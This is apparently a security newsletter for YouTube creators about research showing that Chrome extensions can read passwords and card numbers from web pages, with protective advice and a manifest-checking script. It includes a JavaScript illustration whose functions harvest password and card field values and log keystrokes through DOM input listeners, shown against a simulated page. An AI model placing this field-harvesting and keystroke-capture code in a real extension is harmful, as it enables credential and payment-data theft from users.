Creator Alert

Hello Reader,

Why this Alert?

We are keeping an eye on a technique, recently demonstrated by a team of researchers from the University of Wisconsin-Madison, by which a Chrome extension can pull passwords straight out of a website's page code and form fields.

The team also found that numerous websites, including some run by Google, hold passwords in plaintext (that means readable, not encrypted or masked) within the code of the web page, where any extension that runs on that page can read them.

Among the top 10,000 websites they tested, here are some notable examples that are exposed to this technique:

  • Gmail.com – plaintext passwords in the HTML source code
  • Amazon.com – credit card details (including the security code) and ZIP code visible in plaintext in the page's source code
  • Facebook.com – user inputs can be extracted via the DOM API
  • Citibank.com – user inputs can be extracted via the DOM API
  • Cloudflare.com – plaintext passwords in the HTML source code

Here are some websites that expose Social Security Numbers in the same way:

  • Irs.gov – SSNs visible in plaintext in the page's source code
  • Capitalone.com – SSNs visible in plaintext in the page's source code
  • Usenix.org – SSNs visible in plaintext in the page's source code

Our thoughts:

Thankfully, this came to light as a research paper with a proof-of-concept, not as an attack found in the wild, but the weakness it demonstrates is real.

However, now that the paper is out, we are concerned that attackers will use the methods it outlines to collect passwords.

What they would do is publish a seemingly innocent Chrome extension, such as an "ad blocker" or a "ChatGPT helper", with the code that collects this sensitive information hidden inside it. Once installed, the extension runs on the pages you visit and reads what you type into the page's fields.

We are also concerned that such code does not trigger anti-virus software: it uses only the standard features every extension is allowed to use (the same DOM calls a password manager or form filler makes to read a page), so nothing about it looks malicious.
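To show how little is needed, here is a small illustration we added to this alert. It is not code from the researchers' paper or from any real extension. It reads password and card fields through the ordinary DOM API, and because it runs outside a browser it uses a constructed stand-in for the page (FakeDocument and FakeInput) and made-up sample values. The two functions at the top are the whole technique; a real content script would call them with the page's own document.

```javascript
// Added illustration for this alert; not code from the University of
// Wisconsin-Madison paper or from any real extension. It shows how little a
// content script needs in order to read what you type into password and
// card fields, using only the ordinary DOM API. A real content script gets
// `document` from the page it runs on; FakeDocument and FakeInput below are
// a constructed stand-in so the same logic runs offline in Node.

// Fields worth reading. The autocomplete values are the standard HTML ones.
const SENSITIVE_SELECTOR =
  'input[type="password"], input[autocomplete="cc-number"], input[autocomplete="cc-csc"]';

// Snapshot: read the current value of every sensitive field on the page.
// These are the same calls a password manager or form filler uses.
function harvestFields(doc) {
  return Array.from(doc.querySelectorAll(SENSITIVE_SELECTOR)).map((el) => ({
    name: el.name,
    type: el.type,
    value: el.value, // the password or card number, in the clear
  }));
}

// Keystroke capture: record the field's value on every 'input' event, so the
// data is collected even if the site blanks the field before submit.
function watchTyping(doc, sink) {
  for (const el of doc.querySelectorAll(SENSITIVE_SELECTOR)) {
    el.addEventListener('input', (ev) => {
      sink.push({ name: ev.target.name, value: ev.target.value });
    });
  }
}

// ---- constructed stand-in for the page's DOM (just enough for the two functions above) ----
class FakeInput {
  constructor(name, type, autocomplete = '') {
    this.name = name;
    this.type = type;
    this.autocomplete = autocomplete;
    this.value = '';
    this.listeners = {};
  }
  addEventListener(event, fn) {
    (this.listeners[event] = this.listeners[event] || []).push(fn);
  }
  // Simulate the user typing: the browser fires 'input' after each character.
  typeText(text) {
    for (const ch of text) {
      this.value += ch;
      for (const fn of this.listeners.input || []) fn({ target: this });
    }
  }
}

class FakeDocument {
  constructor(inputs) {
    this.inputs = inputs;
  }
  // Understands only comma-separated input[attr="value"] selectors, which is
  // all SENSITIVE_SELECTOR uses.
  querySelectorAll(selector) {
    const clauses = selector.split(',').map((s) => {
      const m = /^\s*input\[([\w-]+)="([^"]*)"\]\s*$/.exec(s);
      if (!m) throw new Error('stand-in cannot parse selector: ' + s);
      return { attr: m[1], value: m[2] };
    });
    return this.inputs.filter((el) => clauses.some((c) => el[c.attr] === c.value));
  }
}

// Constructed login-plus-checkout page; the typed values are sample data.
function demo() {
  const page = new FakeDocument([
    new FakeInput('email', 'text'),
    new FakeInput('password', 'password'),
    new FakeInput('cardnumber', 'text', 'cc-number'),
  ]);
  const typed = [];
  watchTyping(page, typed); // the "extension" attaches before the user types
  page.inputs[0].typeText('creator@example.com'); // plain text field: not watched
  page.inputs[1].typeText('hunter2');
  page.inputs[2].typeText('4111111111111111');
  return { snapshot: harvestFields(page), typed };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with node: the snapshot lists the two sensitive fields in the clear, and the typed log has one entry per keystroke, which is why a site clearing the field before submit does not help.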

How does this impact you as a Creator?

Gmail was specifically mentioned, and your Google account is what secures your YouTube channel, so this could put your channel at risk.

This will not get around 2-Factor Authentication on its own, but it could be a way into your other, less protected accounts, or let an attacker work out the "secret formula" you use to create your passwords.

What should you do?

Look at your own Chrome extensions. Are they all absolutely necessary?

We strongly suggest removing those extensions that are not critical.

Not ideal, but you can also disable extensions and only enable them when you need to use them. Chrome also lets you limit where an extension can run: open chrome://extensions, click Details on the extension, and under "Site access" choose "On click" or a short list of specific sites instead of "On all sites". An extension that cannot run on your login page cannot read what you type there.
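If you want to go one step beyond eyeballing the list, here is a small script we added to this alert (it is not from the paper and not a Chrome tool) that reads an extension's manifest.json and reports whether the extension can run code on every site you visit, which is what it needs in order to read fields anywhere. The manifest fields it inspects (manifest_version, permissions, host_permissions, content_scripts matches) are Chrome's real ones; the two sample manifests in the script are constructed for the example. A broad result is not proof of bad intent, since a genuine ad blocker needs exactly that reach, but it tells you which extensions you are trusting with everything you type.

```javascript
// Added example for this alert (not code from the paper or from Chrome). It
// answers one question about an extension's manifest.json: can this extension
// run a script on every site I visit, and so read my form fields anywhere?
// The manifest fields used are the real Chrome ones; AD_BLOCKER_LOOKALIKE and
// YOUTUBE_ONLY_HELPER are constructed samples.

// Match patterns that reach every site the browser can open.
const BROAD_PATTERNS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

function isBroad(pattern) {
  return BROAD_PATTERNS.has(pattern.trim());
}

// Collect every match pattern under which the extension can inject a script.
// "activeTab" on its own is deliberately ignored: it grants access only to the
// tab the user clicks the extension on, and only until that tab navigates.
function scriptReach(manifest) {
  const patterns = new Set();
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) patterns.add(m);
  }
  const perms = manifest.permissions || [];
  const isHostPattern = (p) => p === '<all_urls>' || p.includes('://');
  if (manifest.manifest_version >= 3) {
    // MV3: programmatic injection needs the "scripting" permission plus a
    // host_permissions entry for the site.
    if (perms.includes('scripting')) {
      for (const h of manifest.host_permissions || []) patterns.add(h);
    }
  } else {
    // MV2: chrome.tabs.executeScript works on any host pattern listed in permissions.
    for (const p of perms.filter(isHostPattern)) patterns.add(p);
  }
  return [...patterns];
}

function triage(manifest) {
  const patterns = scriptReach(manifest);
  const broad = patterns.some(isBroad);
  let verdict;
  if (broad) {
    verdict = 'can run on every page: able to read any field you type into';
  } else if (patterns.length === 0) {
    verdict = 'declares no script injection: cannot read page fields this way';
  } else {
    verdict = 'limited to listed sites: ' + patterns.join(', ');
  }
  return { name: manifest.name, patterns, broad, verdict };
}

// Constructed sample manifests (names and files are made up).
const AD_BLOCKER_LOOKALIKE = {
  manifest_version: 3,
  name: 'Super Ad Blocker (sample)',
  permissions: ['storage', 'scripting'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'], run_at: 'document_idle' }],
};

const YOUTUBE_ONLY_HELPER = {
  manifest_version: 3,
  name: 'Studio Helper (sample)',
  permissions: ['activeTab'],
  content_scripts: [{ matches: ['https://studio.youtube.com/*'], js: ['helper.js'] }],
};

for (const m of [AD_BLOCKER_LOOKALIKE, YOUTUBE_ONLY_HELPER]) console.log(triage(m));
```

Chrome keeps a copy of each installed extension under your profile's Extensions folder, one subfolder per extension ID and version, with its manifest.json inside; paste one of those into the script in place of the samples to check an extension you actually have installed.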

Want to know more?

Read the research paper here.

Keep safe out there,

The Security For Creators Team

Was this sent to you? Sign up here.

Want to secure your YouTube channel? Start here.